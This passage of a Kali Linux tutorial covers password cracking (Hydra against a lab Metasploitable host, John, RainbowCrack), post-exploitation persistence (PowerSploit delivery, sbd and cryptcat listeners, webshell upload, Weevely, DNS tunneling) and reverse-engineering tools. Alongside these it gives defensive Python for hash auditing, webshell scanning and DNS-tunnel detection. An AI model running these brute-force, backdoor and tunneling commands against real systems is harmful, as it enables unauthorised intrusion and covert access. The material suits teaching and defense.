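        print(label, audit(raw, "bank.example"))
```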

In this chapter, we will learn about the important password cracking tools used in Kali Linux.

Hydra

Hydra is a login cracker that supports many protocols to attack ( Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP).

To open it, go to Applications → Password Attacks → Online Attacks → hydra.

Hydra

It will open the terminal console, as shown in the following screenshot.

Open Terminal

In this case, we will brute-force the FTP service of the Metasploitable machine, which has IP 192.168.1.101.

Brute Force

We have created in Kali a word list with the extension ‘lst’ in the path /usr/share/wordlists/metasploit.

Share Wordlist

The command will be as follows −

hydra -L /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 -V

where -V shows each username and password combination as it is tried

Hydra Command

As shown in the following screenshot, the username and password are found which are msfadmin:msfadmin

Admin Password

Johnny

Johnny is a GUI for the John the Ripper password cracking tool. Generally, it is used for weak passwords.

To open it, go to Applications → Password Attacks → johnny.

Johnny

In this case, we will get the passwords of the Kali machine as shown in the following screenshot; a file will be created on the desktop.

Desktop

Click “Open Passwd File” → OK and all the files will be shown as in the following screenshot.

Open File

Click “Start Attack”.

Start Attack

After the attack is complete, click “Passwords” in the left panel and the cracked password will be revealed.

Unshaded

John

john is the command-line tool behind the Johnny GUI. To start it, open the terminal and type “john”.

Unshadowing

In case of unshadowing the password, we need to write the following command −

root@kali:~# unshadow passwd shadow > unshadowed.txt 

Rainbowcrack

The RainbowCrack software cracks hashes by rainbow table lookup. Rainbow tables are ordinary files stored on the hard disk. Generally, Rainbow tables are bought online or can be compiled with different tools.

To open it, go to Applications → Password Attacks → click “rainbowcrack”.

RainbowCrack

The command to crack a hash password is −

rcrack path_to_rainbow_tables -f path_to_password_hash 

SQLdict

It is a dictionary attack tool for SQL Server and is very easy and basic to use. To open it, open the terminal and type “sqldict”. It will open the following view.

Sql Dict

Under “Target IP Server”, enter the IP of the server hosting SQL Server. Under “Target Account”, enter the username. Then load the file with the passwords, click “start”, and wait until it finishes.

hash-identifier

It is a tool used to identify the type of a hash, meaning what it is used for. For example, given a hash, it can tell you whether it is a Linux or a Windows hash.

Hash Identifier

The above screen shows that it may be an MD5 hash and that it looks like a Domain Cached Credential.
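Added example, not from this page or from John the Ripper or hash-identifier: a small Python reimplementation of what unshadow does in the John section above, plus a hash-type identifier in the spirit of hash-identifier, used to flag the accounts a cracker would go after first (no password, unsalted hashes that rainbow tables apply to, or fast salted schemes). The passwd and shadow lines, including the hash values, are constructed.

```python
import re
from typing import Dict, List

# crypt(3) prefixes on Linux.
CRYPT_SCHEMES = {
    "$1$": "md5crypt",      # 1000 rounds of MD5: fast on GPUs, weak today
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}
# Schemes worth reporting: no password, unsalted hashes (rainbow-table material,
# which is what RainbowCrack above relies on), or a fast salted scheme.
WEAK = {"empty", "descrypt", "md5crypt", "raw-md5/ntlm"}

# Constructed sample files; the hash bodies are placeholders, not real digests.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
legacy:x:1001:1001::/home/legacy:/bin/sh
"""
SHADOW = """\
root:$6$saltsalt$CONSTRUCTEDHASHVALUE:18000:0:99999:7:::
msfadmin:$1$XjXbA0Lb$CONSTRUCTED:18000:0:99999:7:::
sync:*:18000:0:99999:7:::
legacy::18000:0:99999:7:::
"""


def identify_hash(field: str) -> str:
    """Name the scheme of a passwd/shadow password field, or its lock state."""
    if field == "":
        return "empty"                     # login succeeds with no password at all
    if field == "x":
        return "shadowed"                  # the real hash lives in /etc/shadow
    if field.startswith(("!", "*")):
        return "locked"
    for prefix, name in CRYPT_SCHEMES.items():
        if field.startswith(prefix):
            return name
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "descrypt"                  # traditional DES: 2-char salt, 8-char limit
    if re.fullmatch(r"[0-9a-fA-F]{32}", field):
        return "raw-md5/ntlm"              # 32 hex digits, unsalted (MD5 or NT hash)
    return "unknown"


def unshadow(passwd: str, shadow: str) -> List[str]:
    """Merge passwd and shadow the way John's unshadow does: the 'x' in the
    second passwd field is replaced by the hash from the matching shadow line."""
    hashes: Dict[str, str] = {}
    for line in shadow.splitlines():
        if line and not line.startswith("#"):
            user, _, rest = line.partition(":")
            hashes[user] = rest.split(":")[0]
    merged: List[str] = []
    for line in passwd.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged


def audit_accounts(merged: List[str]) -> Dict[str, str]:
    """{user: scheme} for every account whose password field falls in WEAK."""
    findings: Dict[str, str] = {}
    for line in merged:
        fields = line.split(":")
        scheme = identify_hash(fields[1])
        if scheme in WEAK:
            findings[fields[0]] = scheme
    return findings


if __name__ == "__main__":
    for user, scheme in audit_accounts(unshadow(PASSWD, SHADOW)).items():
        print(f"{user}: {scheme}")
```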

In this chapter, we will look at the tools Kali provides to maintain access to a compromised machine even after it disconnects and connects again.

Powersploit

This is a tool for Windows machines; it relies on PowerShell being installed on the victim’s machine. It helps the attacker connect to the victim’s machine via PowerShell.

To open it, open the terminal on the left and type the following command to enter into the powersploit folder −

cd /usr/share/powersploit/ 

If you type “ls”, it will list all the powersploit tools that you can download and install on the victim’s machine after you have gained access. Most of them are self-explanatory according to their names.

Powersploit

An easy way to download these tools to the victim’s machine is to serve the powersploit folder over HTTP, which you can do easily with the following command −

python -m SimpleHTTPServer

Download Tool

After this, if you browse to http://<Kali machine ip_address>:8000/, the result is as follows.

Directory Listing

Sbd

sbd is a tool similar to Netcat. It is portable and can be used on Linux and Microsoft machines. sbd features AES-CBC-128 + HMAC-SHA1 encryption. Basically, it lets you connect to a victim’s machine at any time on a specific port and send commands remotely.

To open it, go to the terminal and type “sbd -l -p port” for the server to accept connections.

Connection Accept

In this case, let us put port 44 where the server will listen.

Case Port

On the victim’s site, type “sbd IPofserver port”. A connection will be established where we can send the remote commands.

In this case, it is “localhost” since we have performed the test on the same machine.

Ipofserver

Finally, on the server you will see that a connection has occurred as shown in the following screenshot.

Server Connection

Webshells

Webshells can be used to maintain access or to hack a website. But most of them are detected by antivirus products. The C99 PHP shell is very well known to antivirus vendors; any common antivirus will easily detect it as malware.

Generally, their main function is to send system commands via a web interface.

To open them, type “cd /usr/share/webshells/” in the terminal.

Webshell

As you see, they are divided into classes according to the programming language: asp, aspx, cfm, jsp, perl, php.

If you enter in the PHP folder, you can see all the webshells for php webpages.

Folder

To use a shell such as “simple-backdoor.php”, upload it to a web server, then open the URL of the web shell in the browser.

At the end of the URL, add the cmd parameter with the command to run. You will see all the info shown in the following screenshot.

Write Command
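As an added defender's-side example, not from this page or from the webshells package, the following Python flags PHP files where request input reaches a command-execution or eval call, the pattern that simple-backdoor.php and C99-style shells share, and files where a decoder feeds eval (the obfuscation antivirus signatures key on). The sample files are constructed and simplified, not copies of anything under /usr/share/webshells.

```python
import re
from typing import Dict, List, Set

# PHP calls that hand a string to the operating system or to the interpreter.
DANGEROUS_CALL = re.compile(
    r"\b(system|exec|passthru|shell_exec|popen|proc_open|eval|assert)\s*\(")
# Where attacker-controlled data enters a request handler.
USER_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b")
# Decoders that C99-style shells wrap their code in to dodge signature scans.
OBFUSCATION = re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")

# Constructed files: ordinary code, a minimal command relay, an encoded loader.
SAMPLES = {
    "index.php": "<?php\necho 'hello';\nsystem('date');\n",
    "uploads/avatar.php": "<?php\n$c = $_REQUEST['cmd'];\nsystem($c);\n",
    "tools/x.php": "<?php\neval(base64_decode('...placeholder...'));\n",
}


def tainted_vars(source: str) -> Set[str]:
    """Variables assigned anywhere in the file from a request superglobal."""
    return set(re.findall(
        r"\$(\w+)\s*=\s*[^;]*?\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b", source))


def scan_php(source: str) -> List[Dict[str, object]]:
    """Findings for one file: dangerous calls fed by user input or by a decoder.
    Crude by design: the argument is taken to be the rest of the line."""
    tainted = tainted_vars(source)
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in DANGEROUS_CALL.finditer(line):
            arg = line[m.end():]
            reasons = []
            if USER_INPUT.search(arg) or any(
                    re.search(r"\$" + re.escape(v) + r"\b", arg) for v in tainted):
                reasons.append(f"user input reaches {m.group(1)}()")
            if OBFUSCATION.search(arg):
                reasons.append(f"decoded payload passed to {m.group(1)}()")
            if reasons:
                findings.append({"line": lineno, "call": m.group(1),
                                 "reason": "; ".join(reasons)})
    return findings


def scan_tree(files: Dict[str, str]) -> Dict[str, List[Dict[str, object]]]:
    """path -> findings, for every file that produced at least one."""
    report: Dict[str, List[Dict[str, object]]] = {}
    for path, source in files.items():
        hits = scan_php(source)
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLES).items():
        for hit in hits:
            print(f"{path}:{hit['line']}: {hit['reason']}")
```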

Weevely

Weevely is a PHP web shell that simulates a telnet-like connection. It is a tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free hosted ones.

To open it, go to the terminal and type “weevely” where you can see its usage.

Weevely

To generate the shell, type “weevely generate password pathoffile”. As seen in the following screenshot, it is generated in the “Desktop” folder; the file is then uploaded to a web server to gain access.

Generate Shell

After uploading the web shell as shown in the following screenshot, we can connect to the server with cmd using the command “weevely URL password”; you can see that a session has started.

Uploading File

http-tunnel

http-tunnel creates a bidirectional virtual data stream tunneled in HTTP requests. The requests can be sent via a HTTP proxy if so desired. This can be useful for users behind restrictive firewalls. If WWW access is allowed through a HTTP proxy, it’s possible to use http-tunnel and telnet or PPP to connect to a computer outside the firewall.

First, we should create a tunnel server with the following command −

httptunnel_server -h

Then, on the client side type “httptunnel_client -h” and both will start to accept connections.

dns2tcp

This is another tunneling tool that passes TCP traffic through DNS traffic, that is, UDP port 53.

To start it, type “dns2tcpd”. The usage is explained when you will open the script.

DNSTcp

On the server side, enter this command to configure the file.

# cat >>.dns2tcpdrc <<END
listen = 0.0.0.0
port = 53
user = nobody
chroot = /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain
key = secretkey
resources = ssh:127.0.0.1:22
END
# dns2tcpd -f .dns2tcpdrc

On the client side, enter this command.

# cat >>.dns2tcprc <<END
domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076

Tunneling will start with this command.
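As an added defender's-side example, not from this page or the dns2tcp project, the following Python scores DNS query logs for the traits a dns2tcp-style tunnel leaves behind: many unique, long, high-entropy subdomains under one zone, carried in TXT/KEY records. The log format, the addresses and the zone tunnel.example are constructed.

```python
import math
from collections import defaultdict
from typing import Dict, List, Tuple

# Record types that dns2tcp-style tunnels carry data in; ordinary clients
# rarely issue these in volume.
TUNNEL_QTYPES = {"TXT", "KEY", "NULL"}

# Constructed query log, "time client qtype qname" (not a real resolver format).
# The long labels are payload-sized hex strings; the short ones are normal lookups.
SAMPLE_LOG = """\
10:00:01 10.0.0.5 A www.example.com
10:00:02 10.0.0.5 A cdn.example.com
10:00:03 10.0.0.9 TXT 0123456789abcdeffedcba9876543210.t.tunnel.example
10:00:03 10.0.0.9 TXT abcdef0123456789fedcba9876543210.t.tunnel.example
10:00:04 10.0.0.9 TXT fedcba98765432100123456789abcdef.t.tunnel.example
10:00:04 10.0.0.9 KEY 89abcdef0123456776543210fedcba98.t.tunnel.example
10:00:05 10.0.0.9 TXT 13579bdf02468aceeca86420fdb97531.t.tunnel.example
10:00:06 10.0.0.5 A mail.example.com
"""


def shannon_entropy(text: str) -> float:
    """Bits per character: hex payload approaches 4.0, words sit well below."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(text.count(c) / n * math.log2(text.count(c) / n) for c in set(text))


def analyze(log: str, min_queries: int = 4, min_label_len: int = 20,
            min_entropy: float = 3.5, min_rare_ratio: float = 0.5
            ) -> Dict[Tuple[str, str], Dict[str, object]]:
    """Group queries by (client, zone) and compute tunnel indicators per group.
    zone = last two labels; the leftmost label is where a tunnel packs its data."""
    groups: Dict[Tuple[str, str], List[Tuple[str, str]]] = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        _ts, client, qtype, qname = line.split()
        labels = qname.rstrip(".").split(".")
        zone = ".".join(labels[-2:])
        groups[(client, zone)].append((qtype.upper(), labels[0]))

    report: Dict[Tuple[str, str], Dict[str, object]] = {}
    for key, entries in groups.items():
        first = [label for _, label in entries]
        unique = len(set(first))
        avg_len = sum(len(label) for label in first) / len(first)
        entropy = shannon_entropy("".join(first))
        rare_ratio = sum(1 for qt, _ in entries if qt in TUNNEL_QTYPES) / len(entries)
        report[key] = {
            "queries": len(entries),
            "unique_labels": unique,
            "avg_label_len": avg_len,
            "entropy": entropy,
            "rare_type_ratio": rare_ratio,
            # All four together: volume, payload-sized labels, random-looking
            # content, data-carrying record types. Allow-list known CDN and
            # antivirus zones before alerting on this in production.
            "suspicious": (unique >= min_queries and avg_len >= min_label_len
                           and entropy >= min_entropy and rare_ratio >= min_rare_ratio),
        }
    return report


def suspicious_pairs(log: str) -> List[Tuple[str, str]]:
    """Sorted (client, zone) pairs that trip every indicator."""
    return sorted(key for key, feats in analyze(log).items() if feats["suspicious"])


if __name__ == "__main__":
    for client, zone in suspicious_pairs(SAMPLE_LOG):
        print(f"possible DNS tunnel: {client} -> {zone}")
```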

cryptcat

It is another tool like Netcat which allows to make TCP and UDP connection with a victim’s machine in an encrypted way.

To start a server to listen for a connection, type the following command −

cryptcat -l -p port -n

cryptcat

Where,

  • -l stands for listening to a connection
  • -p stands for port number parameter
  • -n stands for not doing the name resolution

On client site, the connection command is “cryptcat IPofServer PortofServer”

Port of Server

In this chapter, we will learn about the reverse engineering tools of Kali Linux.

OllyDbg

OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft Windows applications. Its emphasis on binary code analysis makes it particularly useful in cases where the source is unavailable. Generally, it is used to crack commercial software.

To open it, go to Applications → Reverse Engineering → ollydbg

OllyDbg

To load an EXE file, click the yellow “open folder” icon, shown in a red square in the above screenshot.

After loading, you will have the following view where you can change the binaries.

Binaries

dex2jar

This is an application that helps convert an APK (Android) file to a JAR file in order to view the source code. To use it, open the terminal and write “d2j-dex2jar -d /file/location”.

In this case, the file is “classes.dex” on the desktop.

Classes

The following line shows that a JAR file has been created.

Jar File
Created File

jd-gui

JD-GUI is a standalone graphical utility that displays the Java source code of “.class” files. You can browse the reconstructed source code. In this case, we can reconstruct the file that we extracted with the dex2jar tool.

To launch it, open the terminal and write “jd-gui” and the following view will open.

To import the file, click the “Open Folder” icon in the upper left corner and then import the file.

Jd Gui

apktool

Apktool is one of the best tools to reverse the whole android application. It can decode resources to nearly an original form and rebuild them after making modifications.

To open it, go to the terminal and write “apktool”.

To decompile an APK file, write “apktool d apkfile”.

Apktool

Decompilation will start as shown in the following screenshot.

Decompilation

In this chapter, we will learn about some reporting tools in Kali Linux.

Dradis

In all the work we have performed, it is important to share the results that were produced, to track our work, etc. For this purpose, Kali has a reporting tool called dradis, which is a web service.

Step 1 − To start Dradis, type “service dradis start”.

Dradis

Step 2 − To open, go to Applications → Reporting Tools → dradis.

Reporting

The web URL will open. Anybody on the LAN can open it at the following URL: https://<IP of Kali machine>:3004

Log in with the username and password that was used for the first time.

LAN Open

Step 3 − After logging in, you can import files from NMAP, NESSUS, NEXPOSE. To do so, go to “Import from file” → click “new importer(with real-time feedback)”.

Import Real Time

Step 4 − Select the file type that you want to upload. In this case, it is “Nessus scan” → click “Browse”.

Upload Manager

If you go to the home page now, on the left panel you will see that the imported scans are in a folder with their host and port details.

Port Details

Metagoofil

Metagoofil performs a search in Google to identify and download the documents to the local disk and then extracts the metadata. It extracts metadata of public documents belonging to a specific company, individual, object, etc.

To open it, go to “/usr/share/metagoofil/”.

Metagoofil

To start searching, type the following command −

python metagoofil.py 

You can use the following parameters with this command −

  • -d (domain name)
  • -t (file type to download: doc, pdf, etc.)
  • -l (limit the results, e.g. 10, 100)
  • -n (limit the number of files to download)
  • -o (location to save the files)
  • -f (output file)

In the following example, only the domain name has been hidden.

Hidden Domain Name
